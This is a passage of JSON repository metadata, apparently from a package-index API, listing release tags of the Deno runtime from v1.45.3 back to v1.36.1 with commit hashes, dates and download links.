-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload